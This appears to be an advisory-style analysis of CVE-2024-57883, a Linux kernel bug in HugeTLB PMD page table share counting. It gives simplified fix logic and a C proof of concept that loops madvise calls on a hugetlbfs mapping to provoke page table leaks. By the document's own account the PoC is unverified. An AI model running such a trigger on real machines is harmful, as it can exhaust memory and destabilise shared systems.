CVE-2024-57883 - Linux Kernel HugeTLB Page Table Bug—Analysis, Exploit, and the Critical Fix
CVE-2024-57883 is a resolved vulnerability in the Linux kernel (affecting version 6.13 and possibly earlier), specific to the memory manager’s handling of HugeTLB page mappings and PMD (Page Middle Directory) page table reference counting.
Flawed logic in tracking "shares" of PMD page tables, which are used to manage huge pages, could mistake tables that were merely *referenced* for tables that were actually *shared*. This bug could result in serious memory leaks and kernel stability issues.
Let's break down what happened, the vulnerable code, sample attack vectors, and the solution Linux introduced to fix the problem.
What is PMD?
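The page table consists of several levels. The PMD (Page Middle Directory) is an intermediate level: each PMD entry either points to a table of PTEs or maps a huge page directly (2 MiB on x86-64 with 4 KiB base pages). HugeTLB can also share a whole PMD table between processes that map the same region, which is why the kernel needs to know whether a given table is shared.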
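As a rough illustration of where the PMD sits, the sketch below splits a virtual address into per-level indices. It assumes x86-64 with 4-level paging and 4 KiB base pages (9 index bits per level, 12 offset bits); other architectures and configurations differ. The `EX_` macros, `struct va_indices`, and `split_va()` are names made up for this example, not kernel definitions.

```c
#include <stdint.h>

/* Assumption: x86-64, 4-level paging, 4 KiB base pages. */
#define EX_PAGE_SHIFT 12
#define EX_LEVEL_BITS 9
#define EX_PMD_SHIFT  (EX_PAGE_SHIFT + EX_LEVEL_BITS) /* 21: one PMD entry covers 2 MiB */
#define EX_PUD_SHIFT  (EX_PMD_SHIFT + EX_LEVEL_BITS)  /* 30: one PMD table covers 1 GiB */
#define EX_PGD_SHIFT  (EX_PUD_SHIFT + EX_LEVEL_BITS)  /* 39 */
#define EX_LEVEL_MASK ((1u << EX_LEVEL_BITS) - 1)     /* 0x1ff */

/* Index into each level's table for one virtual address. */
struct va_indices {
    unsigned pgd, pud, pmd, pte;
};

/* Extract the four table indices from a virtual address. */
static struct va_indices split_va(uint64_t va)
{
    struct va_indices ix;
    ix.pgd = (unsigned)((va >> EX_PGD_SHIFT) & EX_LEVEL_MASK);
    ix.pud = (unsigned)((va >> EX_PUD_SHIFT) & EX_LEVEL_MASK);
    ix.pmd = (unsigned)((va >> EX_PMD_SHIFT) & EX_LEVEL_MASK);
    ix.pte = (unsigned)((va >> EX_PAGE_SHIFT) & EX_LEVEL_MASK);
    return ix;
}
```

Under these assumptions a single PMD table spans 1 GiB of address space, so leaking one keeps a sizeable region's bookkeeping alive.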
What's the bug?
Several kernel features (*damon*, *page_idle*, etc.) can temporarily increment the *reference count* of a PMD page table without sharing it across processes or address spaces. The kernel, however, took any elevated refcount to mean the table was *shared*, and so never unmapped or freed those page tables. The resulting leaks accumulate over time.
When the bug triggers, the kernel reports a "bad page state" as shown below:
BUG: Bad page state in process sh pfn:109324
page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x66 pfn:0x109324
...
page dumped because: nonzero mapcount
Call trace:
show_stack+0x20/0x38 (C)
dump_stack_lvl+0x80/0xf8
...
split_huge_pages_write+0x25c/0x2d8
...
free_unref_page+0x3cc/0x620
Root of the problem
The error can be pinpointed to code which checks if the PMD table is shared by looking at its reference count, which can be *artificially* increased (e.g., by try_get_folio() in split/merge/idle operations).
// Simplified (pre-fix) logic
if (pmd_table->refcount > 1) {
    // It's shared: do not free page table
} else {
    // Not shared: safe to unmap and free
}
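If another kernel component holds a temporary reference at the moment this check runs, the table is treated as shared and the teardown is skipped. Nothing retries once the temporary reference is dropped, so the page table leaks.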
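The effect of that check can be modeled in user space. The following is only a toy sketch: `struct toy_pmd_table`, `toy_pin()`, `toy_unpin()`, and `toy_teardown_by_refcount()` are hypothetical names, and the real kernel paths are considerably more involved.

```c
#include <stdbool.h>

/* Toy stand-in for a PMD page table page; this is not a kernel structure. */
struct toy_pmd_table {
    int  refcount;  /* 1 for the owner, plus sharers, plus transient pins */
    bool freed;     /* set once the table has been torn down */
};

/* A subsystem takes and later drops a short-lived reference. */
static void toy_pin(struct toy_pmd_table *t)   { t->refcount++; }
static void toy_unpin(struct toy_pmd_table *t) { t->refcount--; }

/*
 * Pre-fix style decision: any refcount above 1 is read as "shared".
 * Returns true if the table was torn down, false if it was skipped.
 */
static bool toy_teardown_by_refcount(struct toy_pmd_table *t)
{
    if (t->refcount > 1)
        return false;   /* looks shared, so the table is left alone */
    t->freed = true;    /* sole user: safe to unmap and free */
    return true;
}
```

Pinning a table whose refcount is 1, calling `toy_teardown_by_refcount()`, and then unpinning leaves `refcount` back at 1 with `freed` still false. No second teardown attempt follows, which is the leak in miniature.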
Exploitation: How could this be abused or triggered?
While no remote exploit, privilege escalation, or RCE is known for this vulnerability, a local user or workload with access to the relevant interfaces can trigger these leaks by getting the kernel to split/merge hugepages frequently or by repeatedly running tools that take page table references (such as the page_idle or damon frameworks). This can lead to resource exhaustion (DoS).
Here's a simplified scenario:
1. Trigger kernel code that references huge page tables (e.g., via /proc/*/pagemap, large file mapping with MADV_HUGEPAGE, etc.).
2. Repeated split/merge operations increment the refcount, even though the table is not actually shared.
3. The kernel leaks page tables, and system memory usage slowly climbs.
4. Potential result: out-of-memory (OOM), kernel crash, or performance collapse on affected systems.
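One way to watch for step 3 is to sample memory counters over time. The sketch below parses `/proc/meminfo`-style text for a named field such as `PageTables` or `HugePages_Free`. Which counter actually moves on an affected kernel is an assumption here, and `meminfo_field()` and `read_meminfo_field()` are helper names invented for this example.

```c
#include <stdio.h>
#include <string.h>

/*
 * Return the numeric value of "key:" in /proc/meminfo-style text,
 * or -1 if the key is missing or has no number after it.
 */
static long meminfo_field(const char *text, const char *key)
{
    size_t klen = strlen(key);
    const char *line = text;

    while (line && *line) {
        /* Match the whole key, not just a prefix of a longer one. */
        if (strncmp(line, key, klen) == 0 && line[klen] == ':') {
            long val;
            if (sscanf(line + klen + 1, "%ld", &val) == 1)
                return val;
            return -1;
        }
        line = strchr(line, '\n');
        if (line)
            line++;     /* step past the newline to the next line */
    }
    return -1;
}

/* Read /proc/meminfo and look up one field; returns -1 on any error. */
static long read_meminfo_field(const char *key)
{
    char buf[8192];     /* assumed large enough for typical meminfo output */
    FILE *f = fopen("/proc/meminfo", "r");
    size_t n;

    if (!f)
        return -1;
    n = fread(buf, 1, sizeof(buf) - 1, f);
    fclose(f);
    buf[n] = '\0';
    return meminfo_field(buf, key);
}
```

Calling `read_meminfo_field("PageTables")` before and after a suspect workload, and again once the workload has exited, gives a crude signal: a value that keeps rising across runs and never comes back down is worth investigating.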
Proof-of-Concept (PoC)
*This PoC assumes the vulnerable kernel is running and hugetlbfs is available:*
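#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>   /* ftruncate, close */
#include <sys/mman.h>

#define MAP_LENGTH (2 * 1024 * 1024) /* 2 MiB, a common huge page size */

int main(void) {
    /* Assumes hugetlbfs is mounted at /dev/hugepages with huge pages reserved. */
    int fd = open("/dev/hugepages/hugefile", O_CREAT | O_RDWR, 0666);
    if (fd < 0) { perror("open"); exit(1); }
    if (ftruncate(fd, MAP_LENGTH) < 0) { perror("ftruncate"); exit(1); }

    void *addr = mmap(NULL, MAP_LENGTH, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    if (addr == MAP_FAILED) { perror("mmap"); exit(1); }

    for (int i = 0; i < 100; i++) {
        /* Return values are ignored: the kernel may reject either hint here. */
        madvise(addr, MAP_LENGTH, MADV_DONTNEED);
        madvise(addr, MAP_LENGTH, MADV_HUGEPAGE);
    }

    printf("Done\n");
    munmap(addr, MAP_LENGTH);
    close(fd);
    return 0;
}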
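The loop repeatedly releases and re-advises the mapping to exercise the kernel's huge page map and release paths. Treat it as an illustration rather than a verified reproducer: MADV_HUGEPAGE targets transparent huge pages and may be rejected on a hugetlbfs mapping, and the call trace above shows split_huge_pages_write as the path involved when the bad page state was reported.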
How did Linux fix it?
Instead of trusting refcount for the 'shared' status, Linux added an explicit "share count" field (pt_share_count) for PMDs.
### Key Change (simplified from the upstream patch)
// Before (vulnerable)
if (pmd_page->refcount > 1) {
    // Considered shared
}
// After (fixed)
if (pmd_page->pt_share_count > 0) {
    // Actually shared!
}
This decouples refcount manipulation by miscellaneous kernel subsystems from the core logic of whether this page table is *really* shared and should not be freed.
Relevant change, paraphrased from the patch (not the literal diff)
+/* Use this field for PMD page table share count. */
+pt_share_count = <increment/decrement as page table is shared/unshared>;
- if (pmd_page->refcount > 1)
+ if (atomic_read(&pmd_page->pt_share_count) > 0)
      return; // Marked shared; do not free.
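To see why a dedicated counter helps, here is a small user-space model of the fixed decision. It is a sketch under simplifying assumptions: `struct toy_fixed_table` and its helpers are hypothetical, and plain `int` fields stand in for the atomic counter that the snippet above reads with atomic_read().

```c
#include <stdbool.h>

/* Toy model only; not the kernel's page table descriptor. */
struct toy_fixed_table {
    int  refcount;     /* generic references, including transient pins */
    int  share_count;  /* additional address spaces sharing this table */
    bool freed;        /* set once this user has torn the table down */
};

/* A subsystem takes a short-lived reference; sharing is untouched. */
static void toy_fixed_pin(struct toy_fixed_table *t)   { t->refcount++; }

/* Another address space starts sharing the table. */
static void toy_fixed_share(struct toy_fixed_table *t) { t->share_count++; }

/*
 * Post-fix style decision: only share_count says whether the table is shared.
 * Returns true if the table was torn down, false if it was skipped.
 */
static bool toy_teardown_by_share_count(struct toy_fixed_table *t)
{
    if (t->share_count > 0)
        return false;   /* really shared: leave it for the other users */
    t->freed = true;    /* not shared, regardless of transient pins */
    return true;
}
```

In this model a pinned but unshared table is still torn down, while a table with `share_count` above zero is left alone, which is the distinction the refcount check could not make.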
Fixed in
- Linux mainline commit f8b6ca3a5c53
If you ship distributions or embedded kernels:
- Backport the patch from upstream commit
Conclusion
CVE-2024-57883 was a subtle bug: the conflation of PMD page table *reference count* with *sharing count* caused low-level leakage in memory management. While not directly exploitable for privilege escalation, this bug could allow local DoS attacks or system instability in workloads relying on hugepages.
Linux kernel maintainers responded by creating an explicit *share count* field for PMDs, removing the ambiguity, and resolving the potential for memory leakage.
Further Reading
- Linux Kernel Documentation: HugeTLB pages
- Kernel patch: mm: hugetlb: independent PMD page table shared count
- Page table reference counting pitfalls
Stay informed. Patch early.
Timeline
Published on: 01/15/2025 13:15:12 UTC
Last modified on: 05/04/2025 10:05:49 UTC